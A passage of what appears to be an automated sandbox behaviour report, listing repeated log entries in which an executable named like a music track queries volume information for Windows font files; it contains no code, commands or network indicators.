                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Conan Fegan - Aluminium.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
